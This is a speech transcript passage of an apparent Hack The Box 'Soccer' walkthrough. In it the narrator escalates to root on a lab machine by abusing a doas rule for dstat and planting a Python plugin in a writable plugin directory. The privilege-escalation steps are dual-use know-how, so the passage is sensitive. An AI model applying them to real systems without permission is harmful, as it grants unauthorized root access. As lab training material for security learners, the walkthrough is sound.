  • 00:28:31
    um it's the boy that cried wolf right it
  • 00:28:33
    always says it's vulnerable I always try
  • 00:28:35
    it and it really is
  • 00:28:37
    so just keep going down the list looking
  • 00:28:39
    at when things are red analyzing dot
  • 00:28:42
    socket files
  • 00:28:43
    um I'm not exactly sure off top my head
  • 00:28:45
    how I would exploit this it would
  • 00:28:47
    require more research which means I'm
  • 00:28:49
    just going to keep going down the list
  • 00:28:50
    and just put down the note I probably
  • 00:28:52
    look at the socket files before I look
  • 00:28:54
    for kernel privest just because I think
  • 00:28:56
    that's a bit safer to do whenever you do
  • 00:28:59
    like uh kernel previous like that you
  • 00:29:01
    risk crash in the box so it's always a
  • 00:29:03
    last resort thing right
  • 00:29:05
    so active ports we kind of have an idea
  • 00:29:08
    of the ports um there is my sequel I
  • 00:29:10
    don't think we've actually logged into
  • 00:29:12
    the database yet but you can probably
  • 00:29:14
    get the credentials to my sequel with
  • 00:29:15
    this player account if the web app is
  • 00:29:18
    running there or something right
  • 00:29:20
    um
  • 00:29:22
    last logins not that interesting useful
  • 00:29:24
    software on the box that's just like so
  • 00:29:27
    we can live off the land
  • 00:29:28
    um I don't see anything highlighted in
  • 00:29:30
    red here PHP exec extensions
  • 00:29:34
    um
  • 00:29:35
    well we already had a shell as probably
  • 00:29:38
    www data which would be what nginx is
  • 00:29:40
    running as so being able to drop like a
  • 00:29:43
    PHP file in this directory and execute
  • 00:29:45
    it not really that interesting to me
  • 00:29:47
    unless root was executing these files
  • 00:29:49
    right but I don't think that was the
  • 00:29:52
    case
  • 00:29:54
    um
  • 00:29:55
    much more just web configuration
  • 00:29:58
    uh fast CGI files or sync files
  • 00:30:02
    SSH Keys these are all public so that's
  • 00:30:06
    public knowledge not that interesting to
  • 00:30:07
    me
  • 00:30:09
    uh shd config
  • 00:30:12
    hostile Pam auth
  • 00:30:16
    uncommon pass WD files not really that
  • 00:30:19
    interesting
  • 00:30:25
    my sequel
  • 00:30:27
    uh there is a bash RC file not
  • 00:30:29
    interesting though
  • 00:30:30
    files with interesting permissions I see
  • 00:30:34
    one I don't recognize right off the bat
  • 00:30:35
    it's not highlighted in red but this is
  • 00:30:37
    one of those sections I always look at
  • 00:30:39
    and if you don't want to always like
  • 00:30:41
    have to run lint piece to do this you
  • 00:30:43
    can do it with a simple find command but
  • 00:30:45
    use a local Den do as
  • 00:30:47
    um two things stand out to me I don't
  • 00:30:49
    know exactly what do as is but this is
  • 00:30:52
    also running in local right and local is
  • 00:30:55
    meant to be a place where like the
  • 00:30:56
    package manager doesn't drop it that's
  • 00:30:58
    where the administrator specifically
  • 00:31:00
    puts binaries in these type of
  • 00:31:02
    directories the local directories so
  • 00:31:05
    um
  • 00:31:06
    I would guess that
  • 00:31:09
    um this is unique to this box right or
  • 00:31:13
    maybe not unique in the sense that
  • 00:31:15
    you'll never see it again but it's
  • 00:31:17
    something specifically configured on
  • 00:31:19
    this box as a set uid file which is
  • 00:31:21
    interesting right if you wanted to find
  • 00:31:23
    it without Lin peas you could just do
  • 00:31:25
    like fine slash Dash perm
  • 00:31:28
    -4002 devnoll I think we'll find it I'm
  • 00:31:32
    also going to add a dash LS so he's show
  • 00:31:34
    permissions
  • 00:31:37
    um let's see and we see do as right here
  • 00:31:40
    right
  • 00:31:42
    so if we look at do as so man do as
  • 00:31:47
    it executes command as another user and
  • 00:31:49
    I've done a lot of BSD thing well
  • 00:31:51
    it is a BSD um command
  • 00:31:54
    um do as like the BSD version of sudo
  • 00:31:56
    right so I'm going to see if I can find
  • 00:31:59
    a config for do as so we'll do find
  • 00:32:02
    slash Etsy grep for do as
  • 00:32:06
    we don't find anything let's just find
  • 00:32:08
    slash grep do as and we will pipe errors
  • 00:32:13
    to Dev null
  • 00:32:16
    so there is a user local Etsy duos.com
  • 00:32:19
    that sounds good to me let's take a look
  • 00:32:22
    at it we see permit no password player
  • 00:32:26
    as root and the command is dstat so
  • 00:32:30
    finally us having access to that dstat
  • 00:32:33
    directory is starting to make sense
  • 00:32:36
    um I know we looked at dstat
  • 00:32:37
    specifically that was our group right
  • 00:32:39
    sign slash Dash group player to devno
  • 00:32:46
    it was with all the greps so if we
  • 00:32:49
    remove proc run and CIS
  • 00:32:53
    we can see we can write to use a share
  • 00:32:55
    d-stat
  • 00:32:58
    so if we do man on dstat we can kind of
  • 00:33:01
    see what it is
  • 00:33:08
    let's see
  • 00:33:11
    we'd have to read this entire thing but
  • 00:33:13
    I think it executes Python scripts
  • 00:33:15
    mainly right
  • 00:33:18
    let's just execute dstat
  • 00:33:23
    dash dash help
  • 00:33:26
    is there a plugin option
  • 00:33:31
    let's do dash dash list
  • 00:33:35
    so dstat is listing all the plugins we
  • 00:33:38
    can run let's go to user share dstat
  • 00:33:44
    was this the directory
  • 00:33:46
    or a find
  • 00:33:50
    user
  • 00:33:51
    local share
  • 00:33:53
    and this directory is interesting
  • 00:33:55
    because we are the group owner of it so
  • 00:33:58
    we can write to it so that's why it
  • 00:34:00
    showed up in our find command
  • 00:34:03
    and I'm going to write Please Subscribe
  • 00:34:06
    dot pi
  • 00:34:07
    and let's see
  • 00:34:11
    let's do a less on we're entered
  • 00:34:14
    directly before that was interesting
  • 00:34:21
    does it use your share dstat yeah
  • 00:34:23
    let's see dstat nfs3 dot pi
  • 00:34:31
    see I wonder if we have to create a
  • 00:34:33
    class and everything like this
  • 00:34:36
    is this on GTFO bins
  • 00:34:40
    let's check this first
  • 00:34:44
    hey it is sudo
  • 00:34:53
    so we just have to write a shell script
  • 00:34:55
    in it okay so we don't have to do the
  • 00:34:57
    class and over complicate it like it was
  • 00:35:03
    we just name it dstat underscore XXX or
  • 00:35:07
    whatever you want
  • 00:35:08
    so v d stat please subscribe
  • 00:35:14
    dot pi
  • 00:35:16
    and we will
  • 00:35:17
    import OS
  • 00:35:20
    and then execute a script there right
  • 00:35:25
    so if we now do the d-stat plugins
  • 00:35:30
    let's see I think it was dash dash list
  • 00:35:34
    we can see there is a please subscribe
  • 00:35:37
    so if I just do D Scrap uh
  • 00:35:41
    um
  • 00:35:42
    d-stat and then dash dash the plug-in
  • 00:35:44
    name we should be able to execute it
  • 00:35:48
    and we'll also want to run do as before
  • 00:35:50
    it
  • 00:35:52
    uh operation not permitted
  • 00:35:57
    let's see cat use a local Etsy do as
  • 00:36:01
    let's see
  • 00:36:03
    do I have to specify
  • 00:36:05
    user Bend dstat
  • 00:36:07
    there we go do ID and I am now root
  • 00:36:11
    so I had to do the full path just
  • 00:36:13
    because that's what the CMD had stated
  • 00:36:16
    right so when I just did do as dstat it
  • 00:36:20
    did not match what I was submitted to
  • 00:36:22
    run so it didn't let me to but I put the
  • 00:36:24
    full path there and
  • 00:36:26
    I got in so we can go now and get
  • 00:36:29
    root.txt and that is the box so hope you
  • 00:36:32
    guys enjoy that take care and we'll see
  • 00:36:33
    you all next time
Tags
  • Hack The Box
  • Soccer
  • Linux
  • Penetration Testing
  • SQL Injection
  • dstat
  • Privilege Escalation
  • WebSocket
  • PHP Shell
  • Doas